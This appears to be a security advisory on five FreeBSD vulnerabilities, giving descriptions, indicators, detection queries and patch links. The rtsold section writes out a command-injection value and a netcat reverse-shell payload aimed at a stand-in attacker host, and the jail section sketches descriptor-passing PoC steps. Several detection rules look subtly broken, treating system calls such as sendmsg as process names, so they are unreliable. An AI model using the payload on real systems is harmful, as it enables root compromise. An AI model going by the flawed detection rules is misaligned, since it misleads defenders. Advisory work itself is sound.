Product Overview
| Field | Details |
|---|---|
| Product | FreeBSD Operating System |
| Vendor | FreeBSD Project |
| Affected Components | Jail subsystem, nullfs filesystem, rtsol/rtsold IPv6 configuration service, routing socket kernel module, pf firewall |
| Deployment Environment | Servers, network appliances, cloud infrastructure, virtualization hosts |
| Attack Surface | Local system users, jail tenants, network attackers on the same IPv6 segment |
| Security Impact | Jail escape, command injection with root privileges, kernel crash, denial of service, firewall disruption |
FreeBSD is commonly deployed in environments where strong isolation and network reliability are required. The jail subsystem is widely used for multi-tenant hosting and container-like isolation. Several recently disclosed vulnerabilities affect filesystem mounting, router advertisement handling, kernel routing logic, and firewall packet inspection.
If these issues remain unpatched, a system may be exposed to container escape, remote command execution, kernel panic conditions, or firewall service interruption.
Vulnerability Summary Table
| Vulnerability | CVE | CVSS Score | Severity | Attack Vector | Privileges Required | Exploit Availability |
|---|---|---|---|---|---|---|
| FreeBSD Jail Directory Descriptor Escape | CVE-2025-15576 | 9.8 | Critical | Local / Inter-jail communication | Low | Limited PoC concepts |
| FreeBSD rtsol / rtsold Command Injection | CVE-2025-14558 | 9.0 | Critical | Network | None | Public PoC examples |
| FreeBSD Kernel Stack Buffer Overflow | CVE-2026-3038 | 7.5 | High | Local | Low | No confirmed public exploit |
| FreeBSD Jail nullfs Mount Escape | CVE-2025-15547 | 8.2 | High | Local | Jail privileged user | Research PoC described |
| FreeBSD pf Firewall DoS | CVE-2025-14769 | 7.1 | High | Network | None | No reliable exploit published |
CVE-2025-15576
FreeBSD Jail Directory Descriptor Escape
Vulnerability Description
A flaw was identified in the interaction between FreeBSD jails, nullfs mounts, and Unix domain sockets.
In environments where directories are shared between jails using nullfs, processes are able to exchange file descriptors over Unix sockets. When directory descriptors are transferred, the kernel does not fully enforce the jail root boundary.
Because of this behavior, a process inside a jail may receive a descriptor referencing a directory outside its filesystem root. Once the descriptor is obtained, file operations can be performed relative to that descriptor, effectively bypassing the jail isolation mechanism.
The isolation guarantee provided by jails can therefore be broken, allowing access to the host filesystem.
Affected Components
- FreeBSD jail subsystem
- nullfs filesystem layer
- Unix domain socket descriptor passing
Potential Impact
If exploited successfully:
- Host filesystem directories may become accessible
- Sensitive files such as
/etc/master.passwdor system configuration may be read - Host binaries may be modified
- Privilege escalation from jail user to host administrator may occur
- Multi-tenant hosting environments may experience cross-tenant compromise
Exploitation Scenario
The vulnerability may be triggered when the following conditions are present:
- Multiple jails share a directory through nullfs.
- Communication occurs between processes using Unix domain sockets.
- A directory descriptor referencing an external location is passed to another jail.
Once the descriptor is received, a process can use system calls such as:
openat()
fchdir()
These operations allow traversal of directories that should normally be inaccessible from the jail.
Proof-of-Concept Behavior (Educational Use)
A basic PoC would involve:
- Opening a directory descriptor outside the jail.
- Sending the descriptor via
sendmsg()using theSCM_RIGHTSmechanism. - Receiving the descriptor in another jail using
recvmsg(). - Using
openat()to access files relative to that descriptor.
Example code fragment illustrating descriptor passing:
sendmsg(socket_fd, &msg, 0);
The received descriptor can then be used for filesystem traversal.
Indicators of Compromise
Possible signs of exploitation may include:
- Unexpected file access from jail processes targeting host directories
- Unix socket traffic between jails exchanging file descriptors
- Jail processes interacting with directories not located under the configured jail root
- Unexpected system calls referencing directory descriptors
Log Sources
Detection activities should focus on:
- FreeBSD audit logs
- Kernel security logs
- Process activity monitoring
- Filesystem audit trails
- Container or jail orchestration logs
Detection Rules
Splunk Query
index=freebsd_logs
source="/var/log/audit.log"
("sendmsg" OR "recvmsg")
"SCM_RIGHTS"
| stats count by process, jail_id, user
ElasticSearch Query
process.name:sendmsg OR process.name:recvmsg
AND system.call:SCM_RIGHTS
AND jail.id:*
OSQuery Detection
SELECT pid, name, path
FROM processes
WHERE name IN ('sendmsg','recvmsg');
Mitigation
- Avoid sharing directories across multiple jails using nullfs
- Restrict Unix socket communication across jail boundaries
- Apply vendor patches immediately
Official Patch
FreeBSD security update available through the official advisory.
Patch and upgrade instructions:
https://www.freebsd.org/security/advisories/
CVE-2025-14558
FreeBSD rtsol / rtsold Command Injection
Vulnerability Description
The rtsol utility and rtsold daemon are used in FreeBSD systems to process IPv6 Router Advertisement messages for automatic network configuration.
Router advertisement packets may contain a Domain Name Search List (DNSSL) option. This value is processed by the system and forwarded to the resolvconf shell script responsible for updating DNS resolver configuration.
The DNSSL value is not properly sanitized before being passed to the shell environment. If shell metacharacters are embedded within the DNSSL field, the script interprets them as commands.
Because the daemon runs with elevated privileges, the injected commands execute with root permissions.
Impact
Successful exploitation may lead to:
- Remote command execution
- Reverse shell installation
- Persistence mechanisms
- Complete system compromise
Exploitation Method
An attacker located on the same IPv6 network sends a crafted router advertisement containing a malicious DNSSL value.
Example malicious DNSSL entry:
$(touch /tmp/compromised)
When the system processes the advertisement, the command embedded within the DNSSL field is executed by the shell.
Reverse Shell Payload (Educational)
$(nc attacker_ip 4444 -e /bin/sh)
When processed by resolvconf, a shell connection would be established back to the attacker.
Indicators of Compromise
- Unexpected files created in temporary directories
- Suspicious outbound connections initiated by rtsold
- Execution of shell commands during router advertisement processing
- DNS configuration changes triggered by abnormal router advertisements
Log Sources
Monitoring should include:
- System daemon logs
- Network monitoring logs
- IPv6 router advertisement capture
- Process execution monitoring
Detection Rules
Suricata Detection
alert ipv6 any any -> any any
(msg:"FreeBSD rtsold DNSSL command injection attempt";
content:"$("; nocase; sid:10014558;)
Splunk Query
index=syslog
process="rtsold"
("$( " OR ";")
| stats count by host, process
Elastic Query
process.name:rtsold AND command_line:("$(" OR ";")
Mitigation
- Disable IPv6 router advertisements if not required
- Use network segmentation
- Restrict rogue router advertisements using network security controls
- Apply official FreeBSD patch
Official Patch
Upgrade instructions and patched versions are available through:
https://www.freebsd.org/security/advisories
CVE-2026-3038
FreeBSD Kernel Routing Socket Stack Overflow
Vulnerability Description
A stack buffer overflow was discovered in the kernel routing socket subsystem. The vulnerability occurs within the function responsible for preparing routing messages.
Improper validation of routing message sizes allows data to be written beyond the intended buffer boundaries. This corrupts the kernel stack and may trigger the stack canary protection mechanism.
Once the canary integrity check fails, the kernel halts execution to prevent further corruption.
Impact
- Kernel panic
- System crash
- Service disruption
- Potential memory corruption
Exploitation Conditions
A local user capable of interacting with routing sockets may craft malformed routing messages designed to overflow the buffer.
Example affected routine:
rtsock_msg_buffer()
Repeated exploitation attempts could repeatedly crash the system, causing denial of service.
Indicators
- Kernel panic events referencing routing sockets
- Unexpected crashes following routing message processing
- Stack protector failures in kernel logs
Log Sources
Primary detection sources:
/var/log/messagesdmesg- kernel panic dump files
Detection Rules
Splunk Query
index=kernel_logs
("stack protector" OR "kernel panic")
("rtsock" OR "routing socket")
Elastic Query
message:"kernel panic" AND message:"rtsock"
Official Patch
Upgrade instructions:
https://www.freebsd.org/security/advisories
CVE-2025-15547
FreeBSD nullfs Jail Mount Escape
Vulnerability Description
This vulnerability affects the interaction between jail mount privileges and nullfs.
If a privileged user inside a jail has permission to mount filesystems, nullfs mounts may be created that reference directories outside the jail root. Because nullfs mirrors existing directories, it may expose host filesystem paths.
Improper validation allows traversal outside the intended jail environment.
Impact
- Jail escape
- Host filesystem access
- System file modification
- Privilege escalation
Indicators
- Nullfs mount operations initiated from jail environments
- Mount targets referencing host directories
- Unexpected filesystem visibility inside jails
Detection Rules
Splunk Query
index=syslog
"mount" AND "nullfs"
| stats count by host,user
OSQuery
SELECT *
FROM mounts
WHERE type='nullfs';
Official Patch
https://www.freebsd.org/security/advisories
CVE-2025-14769
FreeBSD pf Firewall NULL Pointer Dereference
Vulnerability Description
The FreeBSD pf firewall packet inspection engine contains a flaw in its TCP packet modification logic. When handling packets with specific MSS manipulation parameters using the tcp-setmss option, a pointer may remain uninitialized under certain packet conditions.
If the firewall attempts to dereference the pointer, a kernel crash occurs.
Impact
- Firewall crash
- Kernel panic
- Denial of service
- Temporary network outage
Exploitation Scenario
A remote attacker sends specially crafted TCP packets containing abnormal MSS values. When the firewall attempts to process the packet using tcp-setmss rules, the invalid pointer condition is triggered.
Indicators
- pf firewall crash events
- kernel panic messages referencing pf
- network service disruption during packet inspection
Log Sources
Monitoring sources include:
- firewall logs
- kernel logs
- network monitoring systems
- intrusion detection alerts
Detection Rules
Suricata Rule
alert tcp any any -> any any
(msg:"Potential FreeBSD pf tcp-setmss crash attempt";
flow:stateless;
dsize:>1500;
sid:10014769;)
Splunk Query
index=firewall_logs
("pf:" AND "panic")
Official Patch
Security updates are available through the FreeBSD advisory portal:
https://www.freebsd.org/security/advisories
Recommended Security Actions
To reduce exposure to these vulnerabilities:
- Apply FreeBSD security updates immediately
- Limit nullfs mounts inside jail environments
- Disable unnecessary IPv6 router advertisement handling
- Monitor kernel logs for abnormal crashes
- Implement intrusion detection for suspicious network packets
- Audit filesystem mounts and jail configurations regularly
